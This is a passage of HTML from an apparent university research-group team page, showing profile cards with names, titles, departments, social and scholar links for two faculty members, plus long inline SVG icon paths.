xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\" class=\"wp-image-1704 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 